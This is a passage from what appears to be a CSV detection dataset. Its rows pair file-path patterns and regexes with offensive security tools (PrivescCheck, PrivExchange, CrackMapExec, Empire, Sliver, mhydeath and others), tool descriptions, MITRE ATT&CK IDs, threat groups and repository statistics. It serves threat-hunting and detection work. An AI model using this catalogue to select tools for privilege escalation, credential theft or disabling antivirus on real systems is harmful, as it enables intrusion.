Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*/privesc.ps1*",".{0,1000}\/privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*/privesc/*",".{0,1000}\/privesc\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/PrivescCheck*",".{0,1000}\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*/PrivescCheck.ps1*",".{0,1000}\/PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*/PrivExchange*",".{0,1000}\/PrivExchange.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/PrivExchange.git*",".{0,1000}\/PrivExchange\.git.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/privexchange.py*",".{0,1000}\/privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/PrivFu.git*",".{0,1000}\/PrivFu\.git.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*/PrivilegeEscalation/*",".{0,1000}\/PrivilegeEscalation\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/Privileger.git*",".{0,1000}\/Privileger\.git.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*/PrivKit.git*",".{0,1000}\/PrivKit\.git.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/PrivKit/*",".{0,1000}\/PrivKit\/.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects 
privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/proberbyte.go*",".{0,1000}\/proberbyte\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/procdump.py*",".{0,1000}\/procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/process_herpaderping/*",".{0,1000}\/process_herpaderping\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/process_killer.cpp*",".{0,1000}\/process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/processinjection.exe*",".{0,1000}\/processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Process-Instrumentation-Syscall-Hook*",".{0,1000}\/Process\-Instrumentation\-Syscall\-Hook.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/ProduKey.exe*",".{0,1000}\/ProduKey\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prometheus.exe",".{0,1000}\/prometheus\.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/protocols/ftp.py*",".{0,1000}\/protocols\/ftp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/ldap.py*",".{0,1000}\/protocols\/ldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/mssql.py*",".{0,1000}\/protocols\/mssql\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/smb.py*",".{0,1000}\/protocols\/smb\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/ssh.py*",".{0,1000}\/protocols\/ssh\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/proxy/Tor.py*",".{0,1000}\/proxy\/Tor\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/proxy/tor_paths.py*",".{0,1000}\/proxy\/tor_paths\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one 
click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Proxy_Def_File_Generator.cna*",".{0,1000}\/Proxy_Def_File_Generator\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/proxychains-*.zip*",".{0,1000}\/proxychains\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxychains.conf*",".{0,1000}\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxychains.git*",".{0,1000}\/proxychains\.git.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxymaybeshell*",".{0,1000}\/proxymaybeshell.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ps_windows.go*",".{0,1000}\/ps_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/ps1_oneliner.py*",".{0,1000}\/ps1_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PS2EXE.git*",".{0,1000}\/PS2EXE\.git.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/PS2EXE/*",".{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*/ps-empire*",".{0,1000}\/ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - 
T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/psexec.json*",".{0,1000}\/psexec\.json.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embedded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*/psgetsystem.git*",".{0,1000}\/psgetsystem\.git.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embedded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*/PSLessExec.exe*",".{0,1000}\/PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation
